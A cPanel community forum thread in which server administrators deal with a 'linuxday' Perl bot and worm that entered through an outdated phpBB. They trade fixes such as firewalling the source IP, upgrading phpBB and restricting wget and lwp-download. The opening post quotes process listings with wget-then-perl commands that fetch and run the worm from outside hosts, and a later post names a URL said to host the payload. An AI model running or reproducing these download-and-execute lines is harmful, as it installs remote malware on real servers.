The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Help! bot using my resources

Discussion in 'General Discussion' started by petfut, Feb 18, 2005.

  1. petfut

    petfut Well-Known Member

    Joined:
    Feb 14, 2005
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    I have .linuxdaybot running from my tmp dir.
    There is currently several bots running:

    18367 nobody 0 0.0 0.1 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
    18368 nobody 0 0.0 0.2 wget worm.linuxday.com.br -O /tmp/.linuxdayworm
    18421 nobody 0 0.0 0.1 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
    18422 nobody 0 0.0 0.2 wget bot.linuxday.com.br -O /tmp/.linuxdaybot
    18537 nobody 0 0.0 0.1 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
    18538 nobody 0 0.0 0.2 wget worm.linuxday.com.br -O /tmp/.linuxdayworm
    18551 nobody 0 0.0 0.1 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
    18552 nobody 0 0.0 0.2 wget bot.linuxday.com.br -O /tmp/.linuxdaybot

    I don't know how to make it stop..
    Killing wont help, it'll start over again and removing from tmp just makes it disappear for a minute.
     
  2. petfut

    petfut Well-Known Member

    Joined:
    Feb 14, 2005
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    Got it stop. I put the ip to iptaples, to hosts.deny list and restarted apache.
    It is some Korean website nbtour.co.kr
     
  3. gorilla

    gorilla Well-Known Member

    Joined:
    Feb 3, 2004
    Messages:
    699
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney / Australia
  4. gongpro

    gongpro Member

    Joined:
    Jul 6, 2004
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    USA
    cPanel Access Level:
    Root Administrator
    phpbb

    This worm still seams to be going around. I have been hit twice in the last to weeks. During my research of this, found that one issue allowing this worm in is an outdated phpBB. I believe it was an issue with version 2.0.14 and older.

    At this time, http://www.pivadesign.com.br/rc/linuxdaybot.txt seams to be the source of the file.
     
    #4 gongpro, Mar 16, 2006
    Last edited: Mar 16, 2006
  5. jameshsi

    jameshsi Well-Known Member

    Joined:
    Oct 22, 2001
    Messages:
    347
    Likes Received:
    0
    Trophy Points:
    16
    Hey, Guys:
    I encounter the same problems here, I put the IP into deny list and restart apache, then delete these files in /tmp , it seems OK by now, but I have 2 concerns:
    1. Is there any other files edit by this worm ?
    2. How should I do to correct the phpbb scripts ? My phpbb has some modifiction by me, and if I just upgrade it, something will go wrong, so I need to find out how to correct the hole in phpbb scripts, any advice ?
     
  6. johny_gjx

    johny_gjx Active Member

    Joined:
    Apr 15, 2005
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    phpBB has mods for every version that describes the changes as well as files you may use with patch command in linux, however both may fail depending on how your custom modifications have altered codes. The best is to look through the mods and try to apply them one by one so you will see conflicts and would be able to ignore minor differences due to mods.

    Even if you use the patch command and do a partially successful upgrade it would be better than just trying to figure out holes and fixing them.

    as for the server related question it's not possible to predict what may happen but see WHT for tutorials on securing /tmp and if on a VPS then it would be hard to secure that completely but at the last one can set a cron command to be notified of everything with x permission there daily.
     
  7. jameshsi

    jameshsi Well-Known Member

    Joined:
    Oct 22, 2001
    Messages:
    347
    Likes Received:
    0
    Trophy Points:
    16
    After I chmod 700 wget, it seems OK by now although the phpbb still remain not upgrade.
     
  8. johny_gjx

    johny_gjx Active Member

    Joined:
    Apr 15, 2005
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    6
    I don't know but what abut GET and lynx and curl? lynx has --dump switch thats why it came to my mind here.
     
  9. jameshsi

    jameshsi Well-Known Member

    Joined:
    Oct 22, 2001
    Messages:
    347
    Likes Received:
    0
    Trophy Points:
    16
    I just found hacker will use lwp-download to download files, so , I just chmod 700 to lwp-download.
     
  10. tazman2000

    tazman2000 Active Member

    Joined:
    Feb 16, 2005
    Messages:
    27
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Liverpool, UK
    cPanel Access Level:
    Root Administrator
    I've been hacked twice on the latest IPB board scripts, so I'm currently converting them all to VB which I've never had any security issues with having run one for 5 years. Serves me right for going for the cheaper option :rolleyes:
     
  11. jameshsi

    jameshsi Well-Known Member

    Joined:
    Oct 22, 2001
    Messages:
    347
    Likes Received:
    0
    Trophy Points:
    16
Loading...

Share This Page